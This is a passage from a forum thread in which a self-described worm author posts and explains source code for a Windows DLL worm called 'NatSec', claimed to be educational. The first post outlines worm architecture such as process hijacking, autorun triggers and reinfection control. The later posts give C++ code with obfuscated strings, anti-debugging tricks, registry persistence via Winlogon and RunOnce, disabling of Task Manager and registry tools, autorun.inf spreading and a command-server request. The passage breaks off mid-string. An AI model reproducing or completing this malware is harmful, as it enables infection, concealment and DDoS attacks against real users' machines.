Page 1 of 4 123 ... LastLast
Results 1 to 10 of 34

Thread: NatSec worm Source code --- Lets discus..."vinnu" Share/Save - My123World.Com!

  1. #1

    NatSec worm Source code --- Lets discus..."vinnu"

    Author : "vinnu"
    Developer : "vinnu"
    Team : Legion Of Xtremers
    Year : 2006-2007
    IDE : VC++ 6.0
    Type : win32.dll layer worm
    Damage : None, rather has performance boosters

    NatSec (project name) worm was my one of most interestign and efficient worms in the past with its infections in nearly every continent but in very secret manner and very few.
    I m going to reveal its diminished (trimmed) varient for educational purpose with most of its functionality removed, but still can do enough infections.

    It does not damage any data or system resources. Even the cpu and memory utilization is very carefully controlled to keep the system running smoothely.

    The infected system started to talk in PAHARI language but intelligently they keep quite when the sysop listens music or watches movies.
    This worm was developed using fusion technique, i mean by fusing several techniques, like it was developed in c but it had vbs modules too.

    Now let us discus the prerequisites of a worm structure, which are most essential for an artificial life.

    A typical worm structure:

    1. Main circuit - This circuit is responsible for controlling all the activities of different modules. This circuit makes sure which module should be fired at exactly what time and whether is the fired module properly executed.

    Note: Some worms do not let other clones of itself to be executed on same prey. So the main circuit takes care of that, in several ways: in one technique the older executing sibling checks for the reinfection and destroys the reinfecting routines, in another the youngest sibling kills the older (elder) already executing clones. But in case of scattered tentacles in several other prey processes (hijacked processes) the later technique is not reliable and is difficult to implement as it may destabilize the system. So the first technique is used in which the main circuit takes care of the reinfection and kills it.

    Important note: All my other worms too behaved in similar manner. All this stuff and techniques are the general properties and behaviours exhibited by my worms and i am not discussing the behaviours of other's artificial lives every artificial life developer has his own recipe so don't blame me for other's techniques if they are different...."vinnu"

    The main circuit is also called as motherboard as analogous to hardware motherboard of any system.

    2. Displacement circuit: This circuit is most important and cares for placing the necessary parts at their appropriate positions depending upon the privileges of the prey.
    This circuit must execute in the first priority and before most other circuits, it is necessary to call this circuit from main (motherboard) circuit in multithreaded environment.
    It will generate and place all the necessary modules at their proper places.

    3. Process hijacker : Being a dll layer worm, it is most necessary to hijack the victim system's appropriate processes and inject the required code into them. Every hijacked process will be zombied and will carry out a different and distinct activity.

    4. Auto trigger circuit: This is also one of the most important circuit. A worm with only this circuit is enough to survive in a single prey.
    The auto trigger circuit actually a looped circuit which keeps on writing the triggers which are responsible for triggering the worm trigger file at the time of system restart.

    Note: All loops (worms have 99% indefinite/infinite loops) must have sleep times into them, otherwise the system will get unresponsive soon. this is most avoidable situation.

    The sleep time must be chosen in such a way that it doesn't clog up the cpu and not so much to even defeat it from a simple command consoles for loop to defeat the worm.

    5. Feedback circuit: ..............................................
    Last edited by b0nd; 09-16-2010 at 06:48 PM. Reason: Merged

  2. #2

    Sorce code of worm

    // NatSec.cpp : Defines the entry point for the DLL worm Retaliator.
    // Essential : WarheaD Should be able to generate an executable or trigger file on its own.

    /***[+]
    * developer : "vinnu"
    * team : LOX (The Legion Of Xtremers)
    * capability : Extended capabilities in this version have been limited
    for security reasons, capable of performing the DDOS attacks.
    * performance : Care has been taken to avoid the cpu, memory & other resource
    consumption during native processing (The processing of other programs)
    Fixes some security issues and optimizes the cpu & memory performance.
    *
    ***/
    Code:
    #include "stdafx.h"
    #include <iostream>
    #include <windows.h>
    #include <direct.h>
    #include <TlHelp32.h>
    #include <winsock2.h>
    #include <shellapi.h>
    /*--------------MACRO SPACE---------------*/
    #define IPSZ 17
    #define KEYSZ 65
    #define MEDBUFSIZE 257
    #define MINBUFSIZE 129
    #define MAXBUFSIZE 65537
    
    #define MININTERVAL 64
    #define SHORTINTERVAL 24		//
    #define MEDINTERVAL 256			// Time intervals for sustained delay
    #define MAXINTERVAL 512			//
    #define THRDINTERVAL 10000		// Thread wait interval
    #define SMAXINTERVAL 640000		// 640 seconds
    #define HINTERVAL 3600000		// 1 hour
    
    #define FILEATTRIB 39			// Setting atributes to the SuperHidden state.
    #define FILEATTRIBW 38 //34		// Setting attributes to the Hidden+Writable state.
    #define FILEATTRIBL 34
    #define FILEUNATTRIB 32			// Recovering to normal state.
    #define FILEATTRIBAR 33			// Archive + read-only state.
    #define DIRATTRIB 54			// Directory with all attributes set.
    #define DIRUNATTRIB 16			// Just a directory.
    
    #define PORT 80						// Server port
    
    #pragma comment(lib, "ws2_32.lib")
    
    ////-----------Global Shared memory section among different processes:-circuit----------////
    #pragma data_seg (".LOXians")
    	bool nebelwerfer = false;
    	int intLoaded = 0;
    	int iscout = 0; //used for scoutThreads iteration;
    	char developer[] = "\"vinnu\" The LOXian (Legion Of Xtremers)";
    #pragma data_seg()
    ////---------Global Shared memory section among different processes:-circuit end--------////
    char SERVERWARHEAD[] = "127.0.0.1";	// Server address, Do not Remove it even if scramble present.
    char SERVERNAME[] = "loxians.net";			// Server name
    
    char INTERNALPATH[] = "\\NatSec.dll";
    char INTERNALNAME[] = "NatSec.dll";
    char DIRPATH[] = "\\NatSec";
    char DIRTERT[] = "\\Application Data\\WinNT";
    char TERT[] = "\\WinNTsec.dll";
    char INTDIRPATH[] = "\\Documents\\NatSec";
    char DIRNAME[] = "NatSec";
    char PACKFILE[] = "packQCP.lnk";
    /*--------------Global Section------------*/
    HANDLE hProcess = NULL;
    HANDLE hSnapshot = NULL;
    HANDLE hmThread = NULL;
    HANDLE scoutThreads[MININTERVAL];
    char primepath[MEDBUFSIZE], currentpath[MEDBUFSIZE];
    char primepathap[MEDBUFSIZE + IPSZ], currentpathap[MEDBUFSIZE + IPSZ], scrsav[MEDBUFSIZE + IPSZ], saverptr[MEDBUFSIZE], tertiaryap[MEDBUFSIZE + IPSZ];
    char lfailsafe[MEDBUFSIZE + IPSZ], seddir[MEDBUFSIZE + IPSZ], targetfile[MEDBUFSIZE], winbuf[MEDBUFSIZE + KEYSZ];;
    char datapacket[MAXBUFSIZE];
    char *warkeys[KEYSZ], *warcrypt[KEYSZ];
    char *plainbuffer[92];  // Plaintext buffer.
    char *requestStr = plainbuffer[10];/*"GET /lox/nxgis/qproto.txt HTTP/1.0\r\n"\
    				   "Content-Type: text/plain\r\n\r\n";	// The Query string*/
    char retr[25];		// The retrieved checksum, right after the packet arrives
    char chksm[25];		// The checksum retrieved from the datapacket file.
    unsigned short check = 0;	// The checksum to be calculated.
    bool nebel = false;			// winlogon notify circuit needs it. Will be used to terminate the loops. Do not define in shared block.
    /*----------------------------------------*/
    using namespace std;
    //-----Definition block----//
    HANDLE processStarter(LPCTSTR appname, LPTSTR cmdline);
    void cdcryptor(char **crinBuffer);
    unsigned int randNS();
    void controlsp();
    void traceLeaver();
    void privilAdj();
    void spvoice();
    void cruser();
    void sed(char *sourcedir);
    //---Definition block end--//
    Last edited by fb1h2s; 10-13-2010 at 11:05 PM.

  3. #3
    Code:
    BOOL warkeyInit()	{
    try	{					// anti-debug circuit.
    	int x = 0, y = 110;
    	y = y/x;
    } catch (...)	{
    	char *plainbuffer[91];
    	warkeys[0] = "\xdb\xb1\xb3\xab\xab\x8a\xd4\xb1\xb8\xad\xbf\xac\xaa\x8d\xbf\xae\xa7\x9f\xe3\xaf\xb8\xd1\x98\xd5\xdf\x93";
    	warkeys[1] = "\xdf\xaa\xde\xad\xfd\xfa\x9d\xe5\x9f\x9c\xda\x9d\xf7\xcb\xdf\xb8\xad\xbf\xec\x8c\xac\xcd\xb9\xef\xd7\xfd";
    	warkeys[2] = "\xcf\xac\xaa\x8d\xd8\x97\xed\xe4\xcd\x84\xa2\xa9\xc7\xa0\xb3\x9e\x94\xfa\xfc\xac\xbf\xac\xaa\x8d\xd9\xf4";
    	warkeys[3] = "\xbb\x9c\x8c\xcd\xb9\xc1\xa3\xee\x8d\xb1\x9c\xca\xee\x9a\x9f\x8a\xe5\xdc\xeb\x8c\xac\xdd\xb5\xef\xa3\xc6";
    	warkeys[4] = "\xcb\xb0\xb3\xac\xdd\x8d\xd8\xb3\xbd\xcf\xcc\xda\xb3\x8c\xac\xce\xb8\xdf\xee\xad\xbf\xb8\xc7\xd8\xcd\x99";
    	warkeys[5] = "\xff\xae\x9e\xae\xb3\xe9\xaf\xee\xaf\xea\x9d\xe5\xac\xac\x9b\xee\xe9\xda\x9d\xb1\xac\x9d\xa4\xb6\xa7\xb1";
    	warkeys[6] = "\xe9\xc3\x82\xec\xdd\xcd\xab\xad\xea\xaf\xb8\xb3\xdd\xb7\x8c\xcd\xf6\xea\xe9\x8c\xac\xd7\x8c\xef\xd9\x9f";
    	warkeys[7] = "\xf5\x9d\x87\xb1\xd8\xd8\xde\x9e\x9a\x89\x8c\xee\x9c\xfd\xea\x9d\xe5\x8f\xfd\xea\x9d\xe5\x98\xe9\xb6\xf8";
    	warkeys[8] = "\xae\xe9\x96\xac\xdd\xaa\xf5\xce\xa3\xcf\xfc\xcd\x8e\x84\x9c\x83\xd7\xce\xeb\x8c\xac\xdd\x9a\xec\xd7\xa7";
    	warkeys[9] = "\xad\xbf\xac\xaa\x8d\xbf\xac\xda\x8d\xef\xdc\x9a\xcf\x98\xb1\xad\xa4\xf4\xeb\x8c\xb8\xad\x99\xef\x96\xb3";
    	warkeys[10] = "\xea\xd4\xfe\xb1\xdd\xcd\xdc\xe9\xad\xb3\xac\xaf\x8d\xbc\x87\x8e\x9a\xd1\xcb\x8c\xac\xdc\x9d\xef\x89\xe7";
    	warkeys[11] = "\xb1\xf4\x8c\xbc\xd8\xdf\xb1\xb1\xb3\xa1\xbf\xac\xa5\x8d\x93\xdd\x89\xee\xe8\x8c\xac\xfd\xea\x9d\xe5\xb6";
    	warkeys[12] = "\x90\xb3\xdf\xde\xad\xed\xb3\xe3\xad\xb3\xe9\xa8\x8d\xbc\xaf\xda\xb1\xad\x9b\xad\x8c\xed\x9d\xdf\xca\xa4";
    	warkeys[13] = "\xde\xea\x9d\xe5\x8d\xb1\xd9\xae\x9d\xd8\xac\xba\xb3\xa5\xd5\xd8\x9f\xda\xe9\xd8\xa3\xad\xaf\xe8\xad\xc0";
    	warkeys[14] = "\xcf\x9c\x8e\xaf\xdd\xfd\xea\x9d\xe5\xbf\xa9\xd8\x88\xdf\xf2\x9e\xff\x95\xeb\x8c\x9d\x92\xcd\x8f\xd3\xe9";
    	warkeys[15] = "\xd8\x94\x89\xac\xdd\x9a\xdf\xe2\xaa\x86\x8c\xb1\x9d\xbc\x8f\x86\xdc\xb8\x9f\xac\xaa\x8d\x9d\xef\xe7\xa4";
    	warkeys[16] = "\x95\xfd\x9c\xb1\xdf\xde\xfc\xfd\x9a\x9c\xfd\xea\x9c\xfd\xea\x9d\xe5\xaa\xfd\xea\x99\xe5\x8a\xe9\xb6\xf8";
    	warkeys[17] = "\xdf\xdf\x8f\xaa\x87\x9f\x9c\xd2\x87\x8f\xcf\x8a\xcf\x9f\xf1\xde\x9c\xfd\xef\x84\xac\xd4\x94\xef\xde\xb2";
    	warkeys[18] = "\xa5\xa1\xe7\xb5\xd8\xd3\xb1\xea\xd0\xd1\x9c\xfd\xa7\x8d\xc7\xae\xb4\xd8\xd4\xde\x96\xf4\xea\x9d\xe6\xd0";
    	warkeys[19] = "\x97\xda\x9f\xd5\xfa\x98\xa0\xd1\x82\x97\xf1\xb6\xf0\xfd\xa8\xf1\xc2\x8d\xcd\x8c\xac\xff\xc6\xa0\xb7\x84";
    	warkeys[20] = NULL;
    }
    return TRUE;
    }
    void cryptInit()	{
    try	{ int x = 64, y = 32, z = 128;
    	y = 256/(x - x)*(y - y)*(z - z);
    } catch(...)	{
    	plainbuffer[0] = "\xEA\x83\x84\x85\x9B\xA4\xE4\x9F\x89";//"127.0.0.1";//	SERVERWARHEAD[] = "127.0.0.1";	// Server address
    	plainbuffer[1] = "\xF0\xB5\xE5\x9E\xAA\xB1\xCB\x83\xD1\x89\xF8";//"loxians.net";// SERVERNAME[] = "loxians.net";
    	plainbuffer[2] = "\xE3\xE2\xCB\xF9\x8A\x91\xD8\xB2\xE8\xA1\xD5";//"\\NatSec.dll";// INTERNALPATH[] = "\\NatSec.dll";
    	plainbuffer[3] = "\xC3\xB9\xC7\xEE\xAA\xAF\xF4\xD7\xE0\xC0";//"NatSec.dll";// INTERNALNAME[] = "NatSec.dll";
    	plainbuffer[4] = "\xB2\xA7\xBB\xE9\xE2\xC9\xFE";//"\\NatSec";// DIRPATH[] = "\\NatSec";
    	plainbuffer[5] = "\xD0\xAE\xA9\xEF\x99\xF4\xE4\xD0\xAC\xB1\xB1\xF0\xBA\xCD\xED\x9A\xFD\xA1\xBD\xF4\x8B\xC1\xA9";//"\\Application Data\\WinNT";// DIRTERT[] = "\\Application Data\\WinNT";
    	plainbuffer[6] = "\xD0\xFB\xB4\xF4\xA2\x83\xD4\xC8\xDC\x82\xCE\xE1\xD3";//"\\WinNTsec.dll";	// TERT[] = "\\WinNTsec.dll";
    	plainbuffer[7] = "\x80\xAD\xC2\xD0\xD9\xC2\xE8\xD2\xF3\xFD\xC6\x9F\xAA\xF8\xFF\xB9\xFE";//"\\Documents\\NatSec";// INTDIRPATH[] = "\\Documents\\NatSec";
    	plainbuffer[8] = "\xD3\x84\xC2\xC3\xD6\xBC";//"NatSec";	// DIRNAME[] = "NatSec";
    	plainbuffer[9] = "\x95\xEC\xD2\xB2\xFF\xDE\x88\x82\xD6\xDD\xCE";// PACKFILE[] = "packQCP.lnk";
    //----------under-construction-------------
    	plainbuffer[10] ="\xB5\xDB\xAB\xB5\xC4\xE0\xF2\xEA\xE2\xE1\xAB\x8E\xB1\xE7\xA6\xDD\xAD\xE8"\
    			 "\xB0\x96\xC5\xA8\xF8\xC9\xE9\x9C\xC7\xD2\x88\xE8\xB0\x9D\x84\xBD\x97\xBA"\
    			 "\x94\xC1\xE7\xD0\xDD\xD6\xBA\xB0\x88\xC7\xBA\xCE\x98\x9E\xFD\x91\x83\xFC"\
    			 "\x91\xC5\x8F\xDB\xB7\xD5\x80\xAA\xD9\x96\xAB\xBA\xE1\xDE\xAA\xCB\xE5\xA2"\
    			 "\xE2\xB5\xEF\xFE\xAA\xE7\x85\xF1\xEC\x91\x8E\xED\xC2\xDE\x9E";
    			//"GET /lox/nxgis/qproto.txt HTTP/1.0\nContent-Type: text/plain\n\n";	// *requestStr
    	plainbuffer[11] = "\xEF\x83\xA4\xF6\xB6\xF6\xB4\x8E\xF7\xD2\xFF\xE6\xFB\x9D";//"retaliator.dll";	// subkey
    	plainbuffer[12] = "\xE1\xCF\xE3\xCA\xFD\xCF\xF0\x94\xEB\xDD\xBD\xF9\xAC";//"MenuShowDelay";
    	plainbuffer[13] = "\x84\x92\xA9\xD8\xDD\xEC\xAA\xF2\xB1\xA9\xA4\xE7\xD0\xC6\xB4\xCF\xD5\xEA"\
    					  "\xC8\xAD\x95\xC2\xDB\xC3\xDD\xFE\x85\xB7\xCE\xEE\xFE\xA8\xD7\xB5\xF5\x8B"\
    					  "\xFF\xC2\xF5\xA5\x80\xC6\xCF\xE5\x89\xB5\x88\xE5\xC9\xAE\xE9\xAA\xDB\xB6"\
    					  "\xA7\xDF\xC1\xC9\xAF";//"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer"; //subkey
    	plainbuffer[14] = "\xA7\xC0\xAA\xDD\x83\xEB\x80\xF8\xD5\xEB\x8B\xA8\xAF\xE9\xDE\xFE\xE8\xCA";//"NoDriveTypeAutoRun";
    	plainbuffer[15] = "\xAC\xAC\xED\x87\xF8\xE9\xC5\x9B\xB7\xB0\xEA\xE8\xE6\xE0\xBD\xF9\x89\xB6"\
    					  "\xDE\x8A\xE1\x89\x98\xF2\x89\xC4\xBA\xD3\x8B\xDD\x80\xF9\xC2\xFD\xE7\x94"\
    					  "\xA0\xC2\xA8\x99\xBF\xD2\xC9\xF9\xEE\xB8\xBC\x92\xAC\xE1\xBC\xF4\x8D\xB0"\
    					  "\xC2\xC0\xDA\xC2\xDE";//"CurrentControlSet\\Control\\Session Manager\\Memory Management"; // subkey
    	plainbuffer[16] = "\x99\xA4\xAF\x88\xCF\xDF\xC9\xFF\xEC\xDB\xEE\xE0\xFD\x94\xB3\xE9\xCF\xA9\xE9\x86\xFF\x82";//"DisablePagingExecutive";
    	plainbuffer[17] = "\xDC\xD2\xAD\xB9\xC8\xBE\xCA\x90\xD9\xD6\x84\xEB\xEC\xDF\xC7\xBF";//"LargeSystemCache";
    	plainbuffer[18] = "\xDC\xB5\x87\xAC\xD1\xC2\xC3\xC8\xFD\xA1\xA1\xF9\xE2\xF3\x99\x98"\
    					  "\x99\xF6\x91\xD0\xD9";//"Control Panel\\Desktop"; // fsubkey = "Control Panel\\Desktop";
    	plainbuffer[19] = "\xE2\xF2\xDA\xFB\xF1\xBD\xCA\xFA\xF0\xE7\xE4\xFE\x9D\x88\xD7\xFA\x9B\xE8"\
    					  "\xED\x88\xB7\x92\x99\xF5\xEB\x8E\xB6\xDF\x88\x98\xEF\x80\xC4\x89\xBC\xFC"\
    					  "\x97\xF9\x80\xD9\x96\x83\x9A\xF7\xDA\xEB\xF0\xEE\xB7\xF5\xD3\x8E\xEE\xB9"\
    					  "\xFE\x9F\xBD\xF9\x99";//"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";// fsubkey1
    	plainbuffer[20] = "\x87\x91\xD0\xA0\xBD\xDC\xB4\x95\xCB\x97\xF6\xB6\x88\xF7\xD3\xBE\xE4\xE3"\
    					  "\xAD\xE1\x99\x93\xCC\x9E\xB5\xFE\xED\xC2\xF8\xA3\x85\xD5\xC5\xF6\xBE\xDF"\
    					  "\xC7\xFD\xCE\xF8\xA7\xD8\xD7\xC3\xE3\xFB\xC3\xE3\xD3\xC1\xC0\xF0\x8D";//"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"; // shellsubkey
    	plainbuffer[21] = "\xDF\xE3\x8B\xED\xB8\x96\xAF\x8A\xF0\xE7\xE4\xBB\xE5\x82\x97\xA2\xE2\xD6"\
    					  "\xF5\x90\xC9\xDD\xFA\xFB\x8D\x8F\x8C\xF1\xF8\xF6\xCE\xAC\x86\xC9\xF9\xE2"\
    					  "\xB9\xEF\xA4\xD1\x9D\xE4\xDE\xF2\x96\xB9\xF3\xF1\xE6\x8A\xBB\x84\xE2\xF0"\
    					  "\x8E\xC5\x8A\xC0\xAF\xAA\xDC\xF2\xCF\xBE\xE2\xAD\xDD\xC9\xBC\x90\x8F\xC0"\
    					  "\xE9\xDE\x82\xD1\xAC\x9A";//"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"; // accsubkey
    	plainbuffer[22] = "\x93\x80\xBD\xCA\xC2\xC2\xC7\x8C\xAD\xF6";//"\", ntevent";
    	plainbuffer[23] = "\xF4\xA0\xA8\xB2\xF1\xE8\xEC\xFE\xC0\xF9\x85\x8F\xBD\x92\xE6\x93\x84\xE9"\
    					  "\x8A\xFA\x83\x98\x8E\xCC\x9A";//"Explorer.exe winntobj.vbs"; // shellval = "Explorer.exe winntobj.vbs";
    Last edited by fb1h2s; 10-13-2010 at 10:56 PM.

  4. #4
    Code:
    plainbuffer[24] = "\xDF\xC5\xEB\xCB\xDB\xBB\xFF\x8A\x80\xD7\xA6\xFB\xC3\xC2\xD7\x9B\x8D\xF8"\
    					  "\xE4\xFA\xF0\x81\xF2\xDC\x9D\xA7\xA2\xF2\xA8\xBF\xAE\x8C\xC3\xC7\xFA\xCA"\
    					  "\xFF\xCF\xEE\xE1\xF4\x8D\x9B\xE3\xC0\xB5\xFE\x86\xEC\x94\xED\xB1\xF4\xCC"\
    					  "\xB4\xB0\xC3\xD4\xC1";//"software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer"; // subkey
    	plainbuffer[25] = "\xE0\x86\xCE\xF9\xCB\xCE\xA8\xD4\xF1\xD6\xC4\xEF\x9F\xF2\xAC\xA5\xC2\xAA"\
    					  "\xB6\xCA\x8C\xE3\xD5\xB6\xD9\xEE\x84\xEF\xCF\xC1\xD7\xB0\xB6\xEB\x8C\x8C"\
    					  "\xAA\xD0\xC4\xC0\x86\xF1\x90\xA0\xF0\xE7\xCC\xB4\x98\x99\xC1\x96\xC6\xDA"\
    					  "\xAC\xED\xB2";//"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"; // subkey1
    	plainbuffer[26] = "\xDC\xE3\xBD\xCA\xFC\xC4\xE2\xE4\xF9\x8B\x82\xCA";//"SearchHidden";
    	plainbuffer[27] = "\x9B\xB6\xFC\xCB\xE5\xF3\xF9\x80\xE2\xE8\xA6\xF9\xBB\xED\x88\x8A\xF3\x92\x83\xF7";//"DisableRegistryTools";
    	plainbuffer[28] = "\xD2\x9D\x99\xFC\x84\xBC\xF2\x8E\xFE\xA6\x91\xF5\xC7\xA3";//"DisableTaskmgr";
    	plainbuffer[29] = "\xEB\xC5\xDA\xC0\xC6";//"Shell";
    	plainbuffer[30] = "\xA5\xBE\xCC\xDE\xDA\x8F";//"natsec";
    	plainbuffer[31] = "\xFF\xDC\xDE\xCF\xE8\xB7\xA7\xDA\xEA\xE9\x99\xD0\xAC\xC6\xA1\xF8\xC5";//"ScreenSaveTimeOut";
    	plainbuffer[32] = "\x9F\xB9\xC1\xE9\xC9\xA0\xEB\xBE\x98\xC8\xCD\xF1\xB4\x8B\xA8\xFA\x8A\xDC\xFB";//"ScreenSaverIsSecure";
    	plainbuffer[33] = "\xBF\x9E\x9F\xE5\xFE\xAB\xF9\xFD\x9D\x98\xEF\xC9";//"SCRNSAVE.EXE";
    	plainbuffer[34] = "\xEE\x86\xFD\x98\x8F\xF3\xB6\xF9\x9F\xD3\xAC\xC7\x84\xF3\xE3\xA8\xDE";//"screenSaveTimeOut";
    	plainbuffer[35] = "\xFF\xB2\xE2\x98\x8F\xEF\xBF\xFD\xC3\xE5\xCD\x90\x8F\xE9\xD6";//"ShowSuperHidden";
    	plainbuffer[36] = "\x97\xF8\x9D\xE7\x82\xDD\xC7\xBE";//"Kernel32";
    	plainbuffer[37] = "\x92\xC2\x8C\xD7\xAF\xC4\xD1\x9B\xC9\xFF\xC5\xEE";//"LoadLibraryA";
    	plainbuffer[38] = "\x8B\xF0\xBC\x9D\xAF\xC2\xDF\xCA\xB4\xE0\xA9\xAC\xEE\xE1\xDC\xB2\x9B\x9E"\
    					  "\xC1\xB2\xD6\xC7\xBC\xE7\xA8\x81\xC2\xBC\xE0\x99\xFE\xF8\xFC\xB9\xD9\xB6"\
    					  "\x9B\xAB\xFD\xE6\xC2\x81\xC8\xAA\x8C\xE5\xE8\xEF\xD4";//"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce"; // subkey
    	plainbuffer[39] = "\xCF\xB2\xAC\xC9\xB2\xEB\xAF\xAF\xC5\xA8\xE3\x8A\xC4\x97\xAC\xB0\xE9\xDE"\
    					  "\xDB\xC8\xF5\xBC\xE3\xE0\xB8\xF9\x93\xDC\x84\xAC\xEE\x98\x81\xF0\xFA\xB1"\
    					  "\xE6\x9C\xB7\xDD\xCB\xFD\xB5\xC0\xB6\x9C\xDF\x89\xB5";//"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"; // lmsubkey
    	plainbuffer[40] = "\xC4\xBE\xF0\xA4\xAA\xE9\xA3\x87\xD1\x80\xE5\xCF\x8D\xA9\xD3\xD8\xE2\xAF"\
    					  "\xED\xE4\xC2\xC5\xEE\xBB\xC6\xCB\x8D\xF1\xF8\xF6\xCE\xCA\xDC\xD5\xFA\x8D"\
    					  "\xDB\xEE\xB4\xEA\xA6\xB6\xFC\xB1\xF6\x89\xC4\x93\x96\xF2\x82\xF0\xF2\x86"\
    					  "\xD3\x98\xBF\xB6\xDE\xD4\xE3\xBB\xE5\xC2\x83\xED\x9C\xB2\x9E";//"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\WinNTsec"; // ntfsubkey
    	plainbuffer[41] = "\xC9\xE9\xE2\xA9\xD5\xAD\x90\xDC\xAD\x93";//"rundll32 \"";
    	plainbuffer[42] = "\xEE\xF6\xC7\xFE\xC5\xA9\xDF\xBA\x9C\xFA\xDE\xCA\xAF\xBD\xAC\xDD";//"\",triggerWarheaD";
    	plainbuffer[43] = "\x87\xB7\xE7\x9A\xB8\xA3\xDF";//"ntevent"; // val2 = "ntevent";
    	plainbuffer[44] = "\xB4\xD4\xE8\xF8\xBD\xF9\x9E";//"*NatSec";
    	plainbuffer[45] = "\xD8\xEF\xBB\x80\x8A\xE1\xC9";//"DllName";
    	plainbuffer[46] = "\xE1\xF6\x88\xF9\xDD";//"Logon";
    	plainbuffer[47] = "\xE2\x80\xED\xCE\xAC\x8C\xD9\xD4\xDF\xCD";//"StartShell";
    	plainbuffer[48] = "\xBA\xDC\xEC\xCE\xDB\xAF\xC1";//"Startup";
    	plainbuffer[49] = "\x89\x9D\xB9\xD1\xD9\xFC\x8B\xDF\xA5\xAA\xF2\xDD\xCE\xAB\x98\x98";//"StartScreenSaver";
    	plainbuffer[50] = "\xB1\xDE\xE9\xFC\xE2\xFE\xCE\xEA\xE3\xB2\xEB\xFE\xDA\xCF\xFF";//"StopScreenSaver";
    	plainbuffer[51] = "\xC6\x86\xD5\x93";//"Lock";
    	plainbuffer[52] = "\xF0\xCF\x8B\xDA\xBB\xB8";//"Unlock";
    	plainbuffer[53] = "\xEC\xBE\xE5\xF8\x97\xD0";//"Logoff";
    	plainbuffer[54] = "\xFA\xE2\xCC\xDA\xF4\xF7\x86\xC3\xD4";//"PostShell";
    	plainbuffer[55] = "\x9F\xDC\x8C\xB8\x93\xA1\xC9\xC9\xF9";//"Reconnect";
    	plainbuffer[56] = "\xFD\xA8\xD0\x8D\xE2\xDF\xF2\xAF\x8D\xEE";//"Disconnect";
    	plainbuffer[57] = "\xF0\xAF\xCD\xAB\x81\xDF\xCA\xD6\xE9\xB1\xA3\xFF";//"\\autorun.inf"; // *autoptr
    	plainbuffer[58] = "\xB5\xA4\xE3\x81\xB8\x83\xF8\x83\xAF\xF7\xFD";//"\\gameNS.EXE"; // *natptr = "\\gameNS.EXE";
    	plainbuffer[59] = "\xB2\xCE\x98\x9E\xFC\x89\xE6\x9C\x9E\xF8\xCB\xFA\x88\xC2";//"\\Retaliate.bat"; // *natbptr = "\\NatSec.bat";
    	plainbuffer[60] = "\xFC\xCC\xCA\xD8\xC5\xFF\xCA\xC2\x87\x87\xD4\x88\xF2\xAA\xB8\xDC\xC2"\
    					  "\xD7\x80\xCB\xEF\xD7\xC0\xF4\x80\xF8\x93\x9F\xA7\x9B\x91\xBB\xA2\xAE"\
    					  "\xC9\xE3\xDC\xD8\xCA\xFD\xDD\xE3\xAE\xF3\xA2\xEB\xF8\xC3\xFC\xEB\x86"\
    					  "\xEC\x90\x91\x9B\xFE\x9C\xBD\xBB\xD8\xC5\x93\xD5\xDA\xD4\xD1\xB7\x99"\
    					  "\xAE\xE1\x8B\x84\xE0\xF0\x92\x9A\xF8\x8B\x8B\xDE\xD2\xAB\x8D\xC8\x8E"\
    					  "\xEF\xB1\xC8\xC7\x88\xC4\xE4\xDD\xDB\xBF\x9F\xCF\xFA\xD9\x86\xD6\xDF"\
    					  "\xBA\xA9\xC5\xAB\x99\xF8\xC5\xC3\xDE\xAD\xCB\xED\xB9\xC8\x9A\xC0\xD0"\
    					  "\xA5\xA8\xF0\xA8\x9D\xAB\x83\xC2\xC1\x84\xD4\xE0\xB9\xF9\xFC\xD6\xFD"\
    					  "\x9F\x8B\xEE\x8C\xDC\x89\xBE\xE7\xAD\x9F\xFF\x8B\xE1\x82\xE2\xFA\xBE"\
    					  "\xED\xFB\xBB\x8C\xAA\xF1\xEF\xC3\xAF\xFF\xF3\xC2\xCE\xE9\xAC\xDD\xF4"\
    					  "\xD7\xEA\xA6\xA8\xD0\xF6\xDF\x90\x87\xEE\x87\x82\xC8\xF9\xA1\xF3\xC1"\
    Last edited by fb1h2s; 10-13-2010 at 10:59 PM. Reason: ewqr

  5. #5
    Code:
    "\xBA\xB0\xA0\x9E\xF5\xF1\x90\x8B\xF2\x99\xD7\xD3\x84\xDE\xAE\x8F\xFA"\
    					  "\xB9\xD8\x8C\xC2\x99\xB3\xB6\xEE\xDE\xE2\xB1\xFE\xB3\xF3\x85\xF4\xE5"\
    					  "\xBB\xF7\x94\xAC\xEB\x94\x9C\xE1\x80\xF4\xED\x80\xAB\x92\xC6\xC0\x89"\
    					  "\xDB\xB7\xA7\x91\x8B\xB3\xB2\xF5\x99\xC2\xE3\xB3\xCF\xD8\xB4\xAD\xFE"\
    					  "\xE5\x95\x9C\xF8\xC6\xA3\xE7\xBF\xFC\xBC\x9B\xF4\x80\xB7\xED\xE5\x9C"\
    					  "\xD7\x84\x89\xC1\x9F\xA5\xAD\xAC\xFF\x8C\x8C\xAE\xCF\xC0\xEA\xFB\xD3"\
    					  "\xD6\xC7\xC4\xFD\xEE\xBB\xCB\xC5\xDA\xC0\xC6\xE8\xC7\xCB\xC4\xEA\x97"\
    					  "\xCA\x85\xA3\xED\xBB\xBB\xFF\xB3\x99\xEC\x83\x98\x82\xF8\xC5\xD1\xFD"\
    					  "\xAE\xCE\x92\xA8\x83\xCA\xC8\xCB\x8D\xE0\xC5\xAC\xCD\x80\xA5\xD3\xAB"\
    					  "\xC0\xC6\xA1\xF8\xE3\x9F\x8D\xAA\xE3\xC7\xDB\x90\xC1\xC1\xF6\xF1\x9B"\
    					  "\xB8\xA6\x84\xF5\xC5\xF8\xF9\x97\xDA\xF2\xAC\xBE\xD8\xB7\xC6\xCE\xF4"\
    					  "\xDE\xE9\xB8\xCE\xD4\xF0\xFE\x80\xAC\x8A\xE8\x8C\xBB\xDC\x83\xC6\xB5"\
    					  "\xEB\xD1\xC0\x96\xD7\xFE\xB0\xD6\xD1\xA3\xF1\xA8\xC6\xE2\xC8\xA2\xD4"\
